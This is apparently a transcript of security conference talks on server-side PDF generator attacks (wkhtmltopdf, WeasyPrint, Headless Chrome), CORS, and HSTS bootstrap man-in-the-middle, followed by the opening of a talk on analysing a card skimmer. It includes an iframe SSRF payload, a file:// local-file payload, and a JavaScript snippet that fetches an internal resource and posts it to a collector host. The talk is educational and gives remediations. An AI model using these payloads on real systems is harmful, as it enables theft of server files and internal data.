that. The PDF generator is going to reach out, grab that secret, and then render it within an iframe. Let's see how that looks. Yep — there's the outside frame, and we've got the secret right inside. So this is one example of the pwnage we can reap with just wkhtmltopdf, which is an HTML renderer.
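That iframe trick boils down to markup like this (reconstructed from the demo's description — /secret is the demo's placeholder endpoint):

```html
<!-- The HTML renderer fetches the iframe's src server-side while building the
     PDF, so a localhost-only resource ends up rendered inside the document. -->
<h1>test</h1>
<iframe src="http://localhost/secret"></iframe>
```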

Alright, let's move on. Changing the screen again.

Alright. Alright, what's the next baby we can kick? Oh, this one was kicked before, at DEF CON 27. This is WeasyPrint, which is called a visual rendering engine, and

WeasyPrint is called, on their website, a smart solution helping web developers to create PDF documents easily. It's really easy to install — it's a pip install. However, it does have quite a few dependencies. Most of those dependencies are already satisfied on Linux; with Windows, it's a bit involved to get those libraries on board. Please reach out if you want to try to replicate this — I can help you through it. So in the exact same way as before, what we want to do is try to extract the user agent to figure out the backend technology. We could catch the user agent just as easily using echo_useragent.py, or we could catch a response, say, in the Burp

Collaborator, if you're a Burp Suite Pro user, or in any other of those third-party services — there you'd be able to see all the headers, for example, not just the user agent. Here we see the user agent is WeasyPrint, and luckily the developers give us the actual version as well. That's real nice. Let's see how this could look. Now, there's a little bit more to this demo, and I want to surprise you all, because this is not intuitive at all — this is the coolest part of the Owning the Clout DEF CON 27 presentation, in my opinion. In the same manner as before, with WeasyPrint, let's catch the user agent. We already know how it creates a PDF — we've got that running already — so let's take a basic user-agent

payload and create a PDF. All right, at this point the browser is going out — excuse me, the back end, WeasyPrint, is going out and grabbing what it thinks is an image, and we capture the user agent: WeasyPrint 47. One of the cool things about WeasyPrint is that it gives developers the ability to include local files. This is not intuitive at all. So given a crafted payload, we're able to include a local file as well. I want to show you here that the iframe payload doesn't actually work with this particular renderer — the iframe just shows up like garbage. So let's try to include a local file instead. In order to do that, we're going to use an a tag in HTML. They

also call it an anchor tag. I've got the payload right here — let me paste it in
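The payload has roughly this shape (reconstructed for illustration — the demo's actual target was a file on the C drive):

```html
<!-- WeasyPrint resolves the file:// href while generating the PDF and embeds
     the referenced local file inside the document, behind the link. -->
<a href="file:///C:/Windows/win.ini">click me</a>
```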

So during the DEF CON 27 research, Ben Sadeghipour and Cody Brocious found, by reading the documentation, that this was actually possible — that they were able to include local files using an href pointing at a local file on the C drive. When the PDF was generated, the payload showed up as a link; however, the file itself was embedded inside the PDF. Let's see that in action. I'm going to save this PDF locally, and I'm going to use a script that goes through and parses the PDF objects, extracts all of those encoded objects within, and then decodes them. Hopefully we'll be able to see the file that was

embedded inside the PDF. First I'm going to save it locally.

And then after that, decode it. There's no encryption going on here — this is just a flate-encoded file — and here we see the password file that happened to be in this temp directory. Really cool, right? Now, that in a terminal is cool and all, but let's move the terminal out of the way, and by clicking on the actual link in the PDF document, you'll see that we can download the file directly from the PDF with that file:// href. There it is. Really cool. All right, moving back to presentation mode.

All right, we just saw this — in this case, we got win.ini. Great. Now, example number three, where it gets super cool. I don't have a demo for this one, but I'd like to show you in these screenshots. So, Headless Chrome — who's heard of it? Probably half of you. Actually, everyone in this room. Great — wow, we got some techies in this room. All right, so this is basically just chrome.exe with the --headless flag. It shipped by default in Chrome 59 and 60, so there's a good chance that if you're using Chrome right now, you can use it with the headless option. And I've actually seen this more and more in web applications, specifically Headless Chrome, because it's so easy. It's plug and

play. You can invoke it with this command: chrome --headless --disable-gpu --print-to-pdf. They recommend disabling the GPU on Windows — I don't know why. The print-to-PDF option sends Chrome out to a website or a local HTML document, and then it creates a PDF out of it. And this is a full-featured headless browser. So this is how it might look: when we catch the user agent, it will actually say HeadlessChrome — it doesn't use the traditional Chrome user agent, which I think is pretty cool. It renders the PDF like that, with the non-existent image shown broken. So this is a full-featured browser — it can do everything a regular browser can do. So what can we do with it? Can

we do JavaScript execution? When we submit this JavaScript, Chrome is going to go take that HTML, parse it, see that there's a script tag, and try to execute that JavaScript. And as a result, document.write is executed within the PDF. We can do a lot more than this, and I probably don't have to explain that to most of the audience members: we now have code execution on the server in the form of JavaScript. So you can do things such as utilize the Fetch API — using the Request interface of the Fetch API, we can create web requests. This can request an internal document, fetch it, and then do something with the response.

For example, you could then take that response and send it out to an exfiltration server — you could send it to a Burp Collaborator instance, you could send it anywhere you want. And not only that, you could do this programmatically and try to access all of those internal endpoints — hey, maybe all of the ports on those external and internal endpoints. You could really wreak havoc, especially given unbridled access to execute JavaScript on a server that sits in a DMZ.
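That fetch-and-forward pattern can be sketched in a few lines (the endpoint names are placeholders, not from the talk's demo):

```javascript
// Hedged sketch of the exfiltration pattern: fetch an internal resource with
// the Fetch API, then POST its body to a collector we control. fetchImpl is
// injectable only so the sketch can be exercised without a network.
async function exfiltrate(internalUrl, collectorUrl, fetchImpl = fetch) {
  const secret = await (await fetchImpl(internalUrl)).text();
  await fetchImpl(collectorUrl, { method: 'POST', body: secret });
  return secret;
}

// e.g. exfiltrate('http://localhost/secret', 'https://collector.example/log');
```

Loop that over a list of internal hosts and ports and you have the programmatic havoc described above.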

There are some limitations on that, though. Browsers have internal security mechanisms, and one of those is called the same-origin policy, or SOP. An origin in HTTP is a tuple of a scheme, a hostname or domain, and a port — those three things together make up an origin. Now, the same-origin policy says that JavaScript on host A can send requests to a totally different host, but if they are of a different origin, it can't go out, access information, and bring that back in. And that's enforced by the browser specifically. So how do we bypass the same-origin policy? Well, there's this nifty little mechanism called cross-origin resource sharing. CORS, or cross-origin resource sharing, is

a relaxation of the same-origin policy, and it allows resources to be shared between different origins. Now, there are many different ways to identify a misconfiguration in CORS, but a few of them are a reflected origin, a trusted null origin, or a website whose Access-Control-Allow-Origin header — which is just metadata — is set to a star, the wildcard.
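Both ideas can be sketched directly (my own helper names; the CORS check is a rough heuristic, not an exhaustive scanner):

```javascript
// An origin is the (scheme, host, port) tuple; the browser's same-origin
// policy compares exactly those three parts. Note URL drops default ports,
// so https://example.com and https://example.com:443 compare as equal.
function sameOrigin(a, b) {
  const ua = new URL(a), ub = new URL(b);
  return ua.protocol === ub.protocol &&
         ua.hostname === ub.hostname &&
         ua.port === ub.port;
}

// Rough heuristic for the CORS misconfigurations mentioned in the talk.
function corsLooksDangerous(requestOrigin, allowOriginHeader) {
  return allowOriginHeader === '*' ||               // wildcard: anyone may read
         allowOriginHeader === 'null' ||            // "null" origin trusted
         allowOriginHeader === requestOrigin;       // origin reflected verbatim
}
```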

For any of you interested in this, I'd highly recommend the Web Security Academy — there are some excellent course challenges there. So there are often ways around the same-origin policy, and these can be achieved through this JavaScript

on the server. There's also a thing called DNS rebinding, which can get really nasty. I'm not going to go into it here because that's a whole other talk, and I'd love to give that talk some other time, maybe at a Hack Fort Worth or DC214. DNS rebinding essentially tricks the browser into violating the same-origin policy, and it does this with a malicious DNS server and JavaScript execution. It gives access to private networks by tunneling traffic through the victim's browser — essentially a zombie browser — and it's a really cool attack. Not only that, there have been a number of tools released lately, specifically NCC Group's Singularity, that make this extremely easy: whereas before it took minutes, now it's taking seconds.

So, remediation for this unsafe PDF generation: I would recommend generating

PDFs within a client-side library. If you're not parsing the HTML on the server, these vulnerabilities can't occur. Also, don't trust user input — that's, again, one of the themes of this presentation. Do not trust user input; sanitize it and prevent it from being ingested directly by the HTML renderer. Next, and finally, I'd like to talk about the bootstrap man-in-the-middle vulnerability and the importance of HTTPS. Let's start with a quick primer on what a man in the middle looks like. Think to yourself — close your eyes, go to your happy place — and maybe picture a man in the middle. What does it look like? All right, well, we've got one here on the screen. This is an example of

an ARP spoofing attack: if you're on the same LAN as a victim, you can impersonate the router. Another one might look like a Wi-Fi Pineapple — a Hak5 Wi-Fi Pineapple. Another might be your ISP, your internet service provider, collecting traffic or collecting what you're looking at online. The next is an HTTPS decryption utility, which many, many enterprises use for security purposes — it decrypts that TLS traffic for inspection and then re-encrypts it. And then perhaps a legal man in the middle — maybe an FBI court order, or the Freedom of Information Act... no, the Patriot Act, that's it.

A really cool example of a man-in-the-middle vulnerability was released in 2005 — years and years ago now. Mati Aharoni — I think he's still president of Offensive Security — came up with a blog post; the tiny URL is in this slide. I'm not gonna get into this attack because I don't think we have time, but I'd highly encourage you to go seek it out. It involves spoofed UDP packets resetting the Cisco IOS router configuration, enabling TFTP, and then reconfiguring the router to make a GRE tunnel with you in the middle. Then in 2009, Moxie Marlinspike released a tool called sslstrip at Black Hat. Really cool tool. This made man-in-the-middle attacks so much

easier for HTTPS traffic. Has anyone heard of this? Maybe? Yeah. This is a nasty tool. Essentially, Moxie was trying to defeat session encryption — that HTTPS encryption — and he found that he was able to insert himself between a victim and the server by matching and replacing: taking advantage of that first HTTP request that came in, which is in complete plain text, upgrading it from HTTP to HTTPS, and forwarding it to the server. Then he would

forward that response from the server and give it back to the victim. This was a really smart tool, and it made man-in-the-middle so much easier. So let's talk about HTTP real quick — HTTP headers. When you send an HTTP request to Twitter, what does it look like? You have some sort of verb — a GET, POST, or DELETE — in the first line, and remember, this is all part of the HTTP protocol, along with the resource that you're looking for and then the protocol and version. In response you might receive an HTTP response code — in this case, 301 means moved permanently — and then a bunch of data back in the form of headers. And all you

need to remember is that headers are essentially just metadata. In this case the Location header is extremely important, because when paired with the 301 it tells the browser to redirect to another resource — in this case HTTPS, the secure resource. So the browser makes this next request to twitter.com, and a whole bunch of other headers are returned. But one specific one I'd like to talk about is the Strict-Transport-Security header: Strict-Transport-Security with a max-age. Let's dissect this a little bit. HTTP Strict Transport Security, also called HSTS — if you want to read the manual, it's RFC 6797 — allows sites to declare themselves accessible only via secure connections. Breaking this out, we have the header and

then the max-age directive, which is the number of seconds to abide by HTTPS — in this case, two years. The includeSubDomains directive means this applies to all the subdomains as well. And there's the preload directive, which states that this value should be preloaded into the browser. Once this header is returned to the client, the client will no longer use unencrypted methods; it will only use encrypted HTTPS. That's how powerful this is: it effectively prevents man-in-the-middle attacks, barring some sort of certificate or encryption vulnerability that could just shatter the entire ecosystem. For example, let's talk about HomeDepot.com as a case study. A user visits HomeDepot.com and an HTTP request is sent. If you type that into your

address bar and press enter, and you've never visited that site before, an unencrypted HTTP request is gonna be sent. Home Depot's gonna come back and redirect you, the browser's gonna go grab the HTTPS — the secure version of the site — and then you're gonna receive the response back. That's generally how the flow goes. However, the next time you visit HomeDepot.com, the exact same thing is going to happen: that first request is always going to be unencrypted. Next, let's take a look at the CDC. The CDC does it a lot better. On the first request, the user types in cdc.gov — they want to figure out what the latest guidance is on COVID — and an unencrypted HTTP request is sent. They respond: hey, 302, the browser needs to check

out the secure version of the site. The secure version of the site is retrieved, and the CDC sends all of the content back over an encrypted channel — but with that extra HSTS header. And that extra HSTS header instructs the browser — and the browser saves this — hey, never again reach out over HTTP. Don't go unencrypted; always talk to me in an encrypted manner. So when the user returns to the site the next day, because he's forgotten the guidance already, the browser will refuse to send that unencrypted request. Instead, it will only send the encrypted request, thus protecting the user — especially if the user is on an untrusted network, such as a local LAN, coffee shop Wi-Fi, et cetera. There are many examples

of HSTS misconfigurations. I'm not going to get into all of them, but HSTS is widely misimplemented on the internet. One example is Microsoft's live.com: if you visit live.com, it redirects you to https://outlook.live.com/owa, and that issues the HSTS header. So why is this an issue?

Well, strict transport security — the HSTS header — is counted per domain, and a subdomain is not the same as its parent domain. So when that HSTS header comes back in the response, it only applies to outlook.live.com, and the client's going to make an unencrypted request every single time they put live.com into that browser bar. live.com is put in the browser bar, an unencrypted request is made, they're redirected to outlook.live.com, they go out and get the encrypted version, and they're sent back an HSTS header. But the next time the user visits live.com, HSTS does not do its job, because that HSTS header was never applied to live.com, and that first unencrypted request will be made again because of this configuration. This might happen when a user gets a new browser, it

might happen when a user uses private mode in some browsers, or it might happen when it's the user's first time visiting a site. This is actually documented in the RFC; it's called the bootstrap man-in-the-middle vulnerability. It's been published for at least 10 years, and it's a known issue. There's only one way that I know of to prevent this, and we'll get into that in a bit. So potentially, right now, today, an attacker could man-in-the-middle a live.com visit on an untrusted network using SSLstrip, still, 11 years after Moxie released that tool. The solution to this is HSTS preload. Preload is a mechanism in which these

HSTS sites can ship with the browser itself. When the browser is downloaded, the domain is already stored; it's in the code, it's in the repository, as long as the site meets certain specifications: it includes subdomains, has safe redirects, and the max-age is sufficiently high. If a domain is preloaded, no HTTP sites will load. No unencrypted sites will load at all, even internal ones, so watch out if you want to do this on your corporate network. However, I would highly recommend HTTPS everywhere. All right, let's hop on over to the demos and duplicate the screens. I'd actually love to show this one: you can check this yourself within a browser, and I'm going to show you the developer tools. Exactly as we

saw before, go to cdc.gov and that first request is going to be unencrypted.

We look at the network tab, go to cdc.gov.

Click on the request to see more about it. Click on that first one and you can see the lock with the slash through it right there. That's an unencrypted transmission. Now the CDC correctly

redirects the user agent or the browser to that HTTPS site, correctly issues that HSTS header, and then the very next request will be encrypted.
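The redirect-then-remember behavior we just watched in the network tab can be modeled in a few lines. Here is a toy sketch of a browser's HSTS cache (the class and method names are illustrative, not any real browser's internals):

```python
import time

class HstsCache:
    """Toy model: remembers which hosts must only be reached over HTTPS."""

    def __init__(self):
        self._expiry = {}  # host -> unix time when the policy lapses

    def note_header(self, host, header_value):
        """Record a Strict-Transport-Security header from an HTTPS response."""
        for directive in header_value.split(";"):
            name, _, value = directive.strip().partition("=")
            if name.lower() == "max-age":
                self._expiry[host] = time.time() + int(value)

    def rewrite(self, url):
        """Upgrade http:// to https:// for hosts with an unexpired policy."""
        scheme, _, rest = url.partition("://")
        host = rest.split("/", 1)[0]
        if scheme == "http" and self._expiry.get(host, 0) > time.time():
            return "https://" + rest
        return url

cache = HstsCache()
print(cache.rewrite("http://cdc.gov/"))           # first visit: stays unencrypted
cache.note_header("cdc.gov", "max-age=31536000")  # HTTPS response set HSTS
print(cache.rewrite("http://cdc.gov/"))           # later visits: upgraded to https
```

The key point the demo makes is visible in the two `rewrite` calls: the very first navigation goes out unencrypted, and only after the header is cached does the browser refuse to speak plain HTTP to that host.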

Let's look at HSTS preload. The preload list can be viewed at hstspreload.org. It's a Chromium project, and the Chromium team, thankfully, assembles all of these domains into a repository, and they actually ship with the main browsers, the main browsers being Edge, Firefox, and Chrome. I'm sorry I mentioned Edge as part of those big three; I had to. Anyway, we can check this at hstspreload.org. It's got the submission requirements, but more importantly, you can check whether your organization's domains are safe or not. For example, if we type in cdc.gov, it states no, they're not preloaded, and this is why: it's doing everything right, but it's just not issuing the preload directive. If we put in live.com, there are a number of

issues with that: for one, there's no HSTS header supplied on the HTTPS version, and the HTTP version doesn't redirect correctly. So this is a good way to check and audit your website to see if it's completely safe. I put my website, hooperlabs.xyz, into the preload list, so it actually shipped with every browser, and I think that's pretty cool. So when we actually go to my website in a browser, the first request, even though the cache is cleared, even though the history is cleared, that first request is always secure. And I think that's pretty cool. All

right, let's move back to the presentation.
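The live.com problem from earlier comes down to how an HSTS policy is scoped. A minimal sketch of that scoping rule as described in RFC 6797 (the function name is my own, not a browser API):

```python
# HSTS scoping sketch: a policy set by one host covers that exact host, and
# its subdomains only when includeSubDomains was sent. It never reaches "up"
# to the parent domain -- which is exactly why outlook.live.com's header
# does nothing for live.com itself.
def hsts_covers(policy_host, request_host, include_subdomains=False):
    if request_host == policy_host:
        return True
    if include_subdomains and request_host.endswith("." + policy_host):
        return True
    return False

# outlook.live.com issued the header, but the user keeps typing live.com:
print(hsts_covers("outlook.live.com", "live.com"))                           # False
print(hsts_covers("live.com", "outlook.live.com", include_subdomains=True))  # True
```

The first call returning False is the bootstrap gap: every fresh visit to the bare domain still starts with an unencrypted request.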

Remediation. So, what can we do to prevent this type of attack? We can implement HSTS preload, but preload means security everywhere, inside your organization and out. This mitigates many man-in-the-middle threats. It protects your users, not just the server. It requires only one single header to be sent, but it can do as much as protect every single user on an untrusted connection. This concludes my presentation. These have been three classes of modern web application vulnerabilities. Thank you, BSides DFW, thank you for watching. I look forward to your feedback, and I look forward to answering your questions in the Discord server. Once again, I'm Kerry Hooper. Thank you.
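As a closing sketch of the preload remediation just described: the header requirements listed on hstspreload.org (a one-year max-age, includeSubDomains, and an explicit preload directive) can be approximated with a quick check like the one below. This only inspects the header value; the real submission service also validates the site's redirect behavior.

```python
# Rough eligibility check mirroring the header rules on hstspreload.org.
ONE_YEAR = 31536000  # seconds; the minimum max-age the preload list accepts

def preload_eligible(header_value):
    max_age = None
    include_sub = preload = False
    for directive in header_value.split(";"):
        name, _, value = directive.strip().partition("=")
        name = name.lower()
        if name == "max-age":
            max_age = int(value)
        elif name == "includesubdomains":
            include_sub = True
        elif name == "preload":
            preload = True
    return max_age is not None and max_age >= ONE_YEAR and include_sub and preload

print(preload_eligible("max-age=31536000; includeSubDomains; preload"))  # True
print(preload_eligible("max-age=31536000"))  # valid HSTS, but not preloadable
```

A header can be perfectly valid HSTS (like the CDC's in the demo) and still fail this check simply by omitting the preload directive.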

Caleb, and I'm here today to present on our topic titled Hey, I Hacked Your Skimmer: Lessons Learned in Embedded Device Security by Observing What Not to Do. If you're here to learn how to make a skimmer for yourselves, you're in the wrong virtual room. As I mentioned, my name is Caleb Davis, and Zain Hussain will also be presenting with me. So a little bit about me. I joined Protiviti in June of 2019, specifically the emerging technologies group, where we work on penetration testing of IoT devices, cloud infrastructure, AI/ML, and quantum computing. I have a degree in electrical engineering from the University of Texas at Tyler, and I began my career as an embedded software developer at a residential HVAC company. As

a software developer, I primarily focused on embedded C code on ARM core microcontrollers for HVAC controls. Being a developer also required me to focus on how to securely design embedded devices, which eventually led me to the much more enjoyable task of actually breaking things. Now I work as an embedded penetration tester, where I focus on things like hardware, firmware, RF testing, APIs, and web and mobile application testing. So hi everyone, my name is Zain Hussain. I also work as a security consultant at Protiviti alongside Caleb. I'm newer to the team; I joined around four months ago. I studied software engineering at the University of Texas at Dallas with a focus in information assurance. I like to work with my

hands and so I jumped at the opportunity to work on hardware for the emerging technologies group. I'm passionate about cars and use my skills to hack them.

So let's take a look at our agenda. In this presentation, we'll first get an overview of the case, then we'll dive into the card skimming device itself. After that, we'll talk about the process of data exfiltration and analysis, then we'll go over the next steps and finally give examples of mitigations that can be taken. And at the end, we'll have some time for questions. All right, so what happened? The client found a skimmer on a POS system at a grocery store, removed it, and brought it to us. They wanted to understand what data, if any, was compromised. Our objective was to analyze the methodology used to skim and store credit card information, as well as to recover any compromised data associated with the credit card skimmer. So what

did we do? Well, we rev